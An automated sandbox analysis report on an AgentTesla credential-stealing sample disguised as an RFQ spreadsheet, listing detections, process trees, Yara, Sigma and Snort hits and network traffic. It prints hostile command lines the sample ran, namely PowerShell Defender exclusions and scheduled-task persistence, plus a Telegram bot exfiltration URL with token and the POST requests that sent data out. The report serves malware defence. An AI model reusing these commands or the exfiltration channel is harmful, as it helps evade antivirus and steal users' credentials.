
Windows Analysis Report
RFQ-101432620247fl#U00e2#U00aexslx.exe

Overview

General Information

Sample name: RFQ-101432620247fl#U00e2#U00aexslx.exe (renamed because original name is a hash value)
Original sample name: RFQ-101432620247flxslx.exe
Analysis ID: 1445865
MD5: 626130b6e15538c11f7c38c2fe4a6039
SHA1: 706ca5ac781496076d1604536b9ce10ac1f62ee1
SHA256: b89d6be0bcfb915492beb7ae726f815dcf289a284e650c200bda4faf5db60fa1

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
Yara detected Telegram RAT
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Contains functionality to log keystrokes (.Net Source)
Initial sample is a PE file and has a suspicious name
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • RFQ-101432620247fl#U00e2#U00aexslx.exe (PID: 3964 cmdline: "C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe" MD5: 626130B6E15538C11F7C38C2FE4A6039)
    • powershell.exe (PID: 6300 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 1892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 2504 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ywKDUBCUA.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7176 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 4284 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ywKDUBCUA" /XML "C:\Users\user\AppData\Local\Temp\tmp9347.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 1308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • ywKDUBCUA.exe (PID: 2260 cmdline: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe MD5: 626130B6E15538C11F7C38C2FE4A6039)
    • schtasks.exe (PID: 7372 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ywKDUBCUA" /XML "C:\Users\user\AppData\Local\Temp\tmpA374.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • ywKDUBCUA.exe (PID: 7424 cmdline: "C:\Users\user\AppData\Roaming\ywKDUBCUA.exe" MD5: 626130B6E15538C11F7C38C2FE4A6039)
    • ywKDUBCUA.exe (PID: 7440 cmdline: "C:\Users\user\AppData\Roaming\ywKDUBCUA.exe" MD5: 626130B6E15538C11F7C38C2FE4A6039)
    • ywKDUBCUA.exe (PID: 7448 cmdline: "C:\Users\user\AppData\Roaming\ywKDUBCUA.exe" MD5: 626130B6E15538C11F7C38C2FE4A6039)
  • cleanup
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"C2 url": "https://api.telegram.org/bot7156462915:AAE3EIUy20eRSFdNZcqhQa0y1tAvt8IT_oY/sendMessage"}
{"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot7156462915:AAE3EIUy20eRSFdNZcqhQa0y1tAvt8IT_oY/sendMessage?chat_id=7062075018"}
Source: sslproxydump.pcap | Rule: JoeSecurity_AgentTesla_1 | Description: Yara detected AgentTesla | Author: Joe Security

Source: 0000000A.00000002.2104193964.00000000043B1000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_CredentialStealer | Description: Yara detected Credential Stealer | Author: Joe Security
Source: 0000000A.00000002.2104193964.00000000043B1000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_AgentTesla_1 | Description: Yara detected AgentTesla | Author: Joe Security
Source: 0000000A.00000002.2104193964.00000000043B1000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_TelegramRAT | Description: Yara detected Telegram RAT | Author: Joe Security
Source: 00000009.00000002.3268439480.0000000003262000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_AgentTesla_1 | Description: Yara detected AgentTesla | Author: Joe Security
Source: 00000010.00000002.3268715008.0000000002D02000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_AgentTesla_1 | Description: Yara detected AgentTesla | Author: Joe Security
Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3bdb0e8.3.unpack | Rule: JoeSecurity_CredentialStealer | Description: Yara detected Credential Stealer | Author: Joe Security
Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3bdb0e8.3.unpack | Rule: JoeSecurity_AgentTesla_1 | Description: Yara detected AgentTesla | Author: Joe Security
Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3bdb0e8.3.unpack | Rule: JoeSecurity_TelegramRAT | Description: Yara detected Telegram RAT | Author: Joe Security
Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3bdb0e8.3.unpack | Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID | Description: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen | Strings:
  • 0x316f2:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
  • 0x31764:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
  • 0x317ee:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
  • 0x31880:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
  • 0x318ea:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
  • 0x3195c:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
  • 0x319f2:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
  • 0x31a82:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
Source: 10.2.ywKDUBCUA.exe.43ebdd0.5.unpack | Rule: JoeSecurity_CredentialStealer | Description: Yara detected Credential Stealer | Author: Joe Security

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe", ParentImage: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe, ParentProcessId: 3964, ParentProcessName: RFQ-101432620247fl#U00e2#U00aexslx.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe", ProcessId: 6300, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ywKDUBCUA" /XML "C:\Users\user\AppData\Local\Temp\tmpA374.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ywKDUBCUA" /XML "C:\Users\user\AppData\Local\Temp\tmpA374.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe, ParentImage: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe, ParentProcessId: 2260, ParentProcessName: ywKDUBCUA.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ywKDUBCUA" /XML "C:\Users\user\AppData\Local\Temp\tmpA374.tmp", ProcessId: 7372, ProcessName: schtasks.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ywKDUBCUA" /XML "C:\Users\user\AppData\Local\Temp\tmp9347.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ywKDUBCUA" /XML "C:\Users\user\AppData\Local\Temp\tmp9347.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe", ParentImage: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe, ParentProcessId: 3964, ParentProcessName: RFQ-101432620247fl#U00e2#U00aexslx.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ywKDUBCUA" /XML "C:\Users\user\AppData\Local\Temp\tmp9347.tmp", ProcessId: 4284, ProcessName: schtasks.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe", ParentImage: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe, ParentProcessId: 3964, ParentProcessName: RFQ-101432620247fl#U00e2#U00aexslx.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe", ProcessId: 6300, ProcessName: powershell.exe

Persistence and Installation Behavior

Source: Process started | Author: Joe Security | Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ywKDUBCUA" /XML "C:\Users\user\AppData\Local\Temp\tmp9347.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ywKDUBCUA" /XML "C:\Users\user\AppData\Local\Temp\tmp9347.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe", ParentImage: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe, ParentProcessId: 3964, ParentProcessName: RFQ-101432620247fl#U00e2#U00aexslx.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ywKDUBCUA" /XML "C:\Users\user\AppData\Local\Temp\tmp9347.tmp", ProcessId: 4284, ProcessName: schtasks.exe

Snort alerts:
Timestamp: 05/22/24-17:27:00.989462 | SID: 2851779 | Source Port: 49712 | Destination Port: 443 | Protocol: TCP | Classtype: A Network Trojan was detected
Timestamp: 05/22/24-17:26:58.094926 | SID: 2851779 | Source Port: 49709 | Destination Port: 443 | Protocol: TCP | Classtype: A Network Trojan was detected


AV Detection

Source: RFQ-101432620247fl#U00e2#U00aexslx.exe | Avira: detected
Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe | Avira: detection malicious, Label: TR/AVI.PWS.Agent.apilj
Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3ba04c8.5.raw.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot7156462915:AAE3EIUy20eRSFdNZcqhQa0y1tAvt8IT_oY/sendMessage?chat_id=7062075018"}
Source: ywKDUBCUA.exe.2260.10.memstrmin | Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7156462915:AAE3EIUy20eRSFdNZcqhQa0y1tAvt8IT_oY/sendMessage"}
Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe | ReversingLabs: Detection: 83%
Source: RFQ-101432620247fl#U00e2#U00aexslx.exe | ReversingLabs: Detection: 83%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe | Joe Sandbox ML: detected
Source: RFQ-101432620247fl#U00e2#U00aexslx.exe | Joe Sandbox ML: detected
Source: RFQ-101432620247fl#U00e2#U00aexslx.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: RFQ-101432620247fl#U00e2#U00aexslx.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Code function: 4x nop then jmp 048C3FC9h | 0_2_048C38A3
Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe | Code function: 4x nop then jmp 050D31F1h | 10_2_050D2ACB

Networking

Source: Traffic | Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.5:49709 -> 149.154.167.220:443
Source: Traffic | Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.5:49712 -> 149.154.167.220:443
Source: unknown | DNS query: name: api.telegram.org
Source: Yara match | File source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3bdb0e8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3ba04c8.5.raw.unpack, type: UNPACKEDPE
Source: global traffic | HTTP traffic detected: POST /bot7156462915:AAE3EIUy20eRSFdNZcqhQa0y1tAvt8IT_oY/sendDocument HTTP/1.1 | Content-Type: multipart/form-data; boundary=---------------------------8dc7a52168f7017 | Host: api.telegram.org | Content-Length: 918 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /bot7156462915:AAE3EIUy20eRSFdNZcqhQa0y1tAvt8IT_oY/sendDocument HTTP/1.1 | Content-Type: multipart/form-data; boundary=---------------------------8dc7a521867a3ca | Host: api.telegram.org | Content-Length: 918 | Expect: 100-continue | Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 149.154.167.220
Source: Joe Sandbox View | ASN Name: TELEGRAMRU
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
Source: unknown | HTTP traffic detected: POST /bot7156462915:AAE3EIUy20eRSFdNZcqhQa0y1tAvt8IT_oY/sendDocument HTTP/1.1 | Content-Type: multipart/form-data; boundary=---------------------------8dc7a52168f7017 | Host: api.telegram.org | Content-Length: 918 | Expect: 100-continue | Connection: Keep-Alive
Source: RFQ-101432620247fl#U00e2#U00aexslx.exe, 00000009.00000002.3268439480.000000000327D000.00000004.00000800.00020000.00000000.sdmp, ywKDUBCUA.exe, 00000010.00000002.3268715008.0000000002D1D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://api.telegram.org
Source: RFQ-101432620247fl#U00e2#U00aexslx.exe, ywKDUBCUA.exe.0.dr | String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: RFQ-101432620247fl#U00e2#U00aexslx.exe, ywKDUBCUA.exe.0.dr | String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: RFQ-101432620247fl#U00e2#U00aexslx.exe, ywKDUBCUA.exe.0.dr | String found in binary or memory: http://ocsp.comodoca.com0
Source: RFQ-101432620247fl#U00e2#U00aexslx.exe, 00000000.00000002.2063886948.00000000028CA000.00000004.00000800.00020000.00000000.sdmp, RFQ-101432620247fl#U00e2#U00aexslx.exe, 00000009.00000002.3268439480.000000000326A000.00000004.00000800.00020000.00000000.sdmp, ywKDUBCUA.exe, 0000000A.00000002.2102960401.00000000030DA000.00000004.00000800.00020000.00000000.sdmp, ywKDUBCUA.exe, 00000010.00000002.3268715008.0000000002D0A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RFQ-101432620247fl#U00e2#U00aexslx.exe, 00000000.00000002.2064422472.0000000003BA0000.00000004.00000800.00020000.00000000.sdmp, RFQ-101432620247fl#U00e2#U00aexslx.exe, 00000000.00000002.2064422472.00000000044C2000.00000004.00000800.00020000.00000000.sdmp, ywKDUBCUA.exe, 0000000A.00000002.2104193964.00000000043B1000.00000004.00000800.00020000.00000000.sdmp, ywKDUBCUA.exe, 00000010.00000002.3264244060.0000000000436000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://account.dyn.com/
Source: RFQ-101432620247fl#U00e2#U00aexslx.exe, 00000009.00000002.3268439480.000000000326A000.00000004.00000800.00020000.00000000.sdmp, ywKDUBCUA.exe, 00000010.00000002.3268715008.0000000002D0A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
Source: RFQ-101432620247fl#U00e2#U00aexslx.exe, 00000000.00000002.2064422472.0000000003BA0000.00000004.00000800.00020000.00000000.sdmp, RFQ-101432620247fl#U00e2#U00aexslx.exe, 00000000.00000002.2064422472.00000000044C2000.00000004.00000800.00020000.00000000.sdmp, RFQ-101432620247fl#U00e2#U00aexslx.exe, 00000009.00000002.3268439480.0000000003211000.00000004.00000800.00020000.00000000.sdmp, ywKDUBCUA.exe, 0000000A.00000002.2104193964.00000000043B1000.00000004.00000800.00020000.00000000.sdmp, ywKDUBCUA.exe, 00000010.00000002.3264244060.0000000000434000.00000040.00000400.00020000.00000000.sdmp, ywKDUBCUA.exe, 00000010.00000002.3268715008.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot7156462915:AAE3EIUy20eRSFdNZcqhQa0y1tAvt8IT_oY/
Source: RFQ-101432620247fl#U00e2#U00aexslx.exe, 00000009.00000002.3268439480.0000000003266000.00000004.00000800.00020000.00000000.sdmp, ywKDUBCUA.exe, 00000010.00000002.3268715008.0000000002D06000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot7156462915:AAE3EIUy20eRSFdNZcqhQa0y1tAvt8IT_oY/sendDocument
Source: RFQ-101432620247fl#U00e2#U00aexslx.exe, ywKDUBCUA.exe.0.dr | String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
Source: unknown | Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49712 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3ba04c8.5.raw.unpack, NDL2m67zO.cs | .Net Code: tmyAmPp
Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3bdb0e8.3.raw.unpack, NDL2m67zO.cs | .Net Code: tmyAmPp
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe
Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe | Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\ywKDUBCUA.exe
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe | Window created: window name: CLIPBRDWNDCLASS

System Summary

Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3bdb0e8.3.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
Source: 10.2.ywKDUBCUA.exe.43ebdd0.5.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3ba04c8.5.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
Source: 10.2.ywKDUBCUA.exe.43b11b0.3.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
Source: 10.2.ywKDUBCUA.exe.43ebdd0.5.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
Source: 10.2.ywKDUBCUA.exe.43b11b0.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3bdb0e8.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3ba04c8.5.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
Source: initial sample | Static PE information: Filename: RFQ-101432620247fl#U00e2#U00aexslx.exe
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Code functions (PID 0, stage 2): 0_2_00E9DE8C, 0_2_048C3360, 0_2_048C3350, 0_2_048C08C0, 0_2_048C58F8, 0_2_06BF7458, 0_2_06BF5230, 0_2_06BF2106, 0_2_06BF7449, 0_2_06BFE570, 0_2_06BF521F, 0_2_06BFE138, 0_2_06BF2DD8, 0_2_06BFDD00, 0_2_06BF7AB9, 0_2_06BF7AC8, 0_2_06BFF810
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Code functions (PID 9, stage 2): 9_2_014F9420, 9_2_014F9BE0, 9_2_014F4A68, 9_2_014F3E50, 9_2_014FCE60, 9_2_014F4198, 9_2_066D2EF0, 9_2_066D56D0, 9_2_066D3F48, 9_2_066DDC30, 9_2_066DBCF8, 9_2_066D9AD8, 9_2_066D8B88, 9_2_066D0040, 9_2_066D3640, 9_2_066D4FF0, 9_2_06811DAE, 9_2_06811DC8, 9_2_071C4C48, 9_2_071C0040
Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe | Code functions (PID 10, stage 2): 10_2_016DDE8C, 10_2_050D2588, 10_2_050D2578, 10_2_050D4C18, 10_2_07307458, 10_2_07302106, 10_2_0730E570, 10_2_07307449, 10_2_07305230, 10_2_0730521F, 10_2_0730E138, 10_2_0730DD00, 10_2_07302C38, 10_2_07307AB9, 10_2_07307AC8, 10_2_0730F810
Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe | Code functions (PID 16, stage 2): 16_2_00F24A68
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeCode function: 16_2_00F29BE016_2_00F29BE0
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeCode function: 16_2_00F2CE6016_2_00F2CE60
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeCode function: 16_2_00F23E5016_2_00F23E50
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeCode function: 16_2_00F2419816_2_00F24198
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeCode function: 16_2_05D6BCF816_2_05D6BCF8
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeCode function: 16_2_05D63F4816_2_05D63F48
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeCode function: 16_2_05D656D016_2_05D656D0
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeCode function: 16_2_05D62EF016_2_05D62EF0
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeCode function: 16_2_05D6004016_2_05D60040
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeCode function: 16_2_05D68B7A16_2_05D68B7A
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeCode function: 16_2_05D69AD816_2_05D69AD8
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeCode function: 16_2_05D64FF016_2_05D64FF0
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeCode function: 16_2_05D6362F16_2_05D6362F
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeCode function: 16_2_05EA1DC816_2_05EA1DC8
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeCode function: 16_2_05EA1DBA16_2_05EA1DBA
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeCode function: 16_2_06854C4816_2_06854C48
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeCode function: 16_2_0685004016_2_06850040
Source: RFQ-101432620247fl#U00e2#U00aexslx.exe | Static PE information: invalid certificate
Source: RFQ-101432620247fl#U00e2#U00aexslx.exe, 00000000.00000002.2070955375.00000000088F0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs RFQ-101432620247fl#U00e2#U00aexslx.exe
Source: RFQ-101432620247fl#U00e2#U00aexslx.exe, 00000000.00000000.2012931126.0000000000554000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameKZAH.exe" vs RFQ-101432620247fl#U00e2#U00aexslx.exe
